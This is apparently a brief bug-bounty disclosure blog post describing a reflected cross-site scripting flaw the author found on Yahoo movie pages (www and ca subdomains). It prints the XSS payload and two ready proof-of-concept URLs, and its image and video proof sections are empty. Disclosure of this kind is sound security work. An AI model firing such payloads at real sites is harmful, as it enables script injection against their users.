TheShahzada. Hello Guys, This is Shahzada Al Shahriar Khan. Known as

I am from Bangladesh. And I am Newbie in Bug Bounty. :P

Well, Now I will share how I found Reflected Cross-Site Scripting (XSS) in main & sub domain of Yahoo.





Vulnerable URL:

1. https://www.yahoo.com/movies/film/[*]

2. https://ca.yahoo.com/movies/film/[*]





Payload I Use:

"><%2fscript><script>alert(document.domain)<%2fscript>





PoC URL:

1. https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>

2. https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>





PoC:





Yahoo Canada Subdomain





Video PoC:



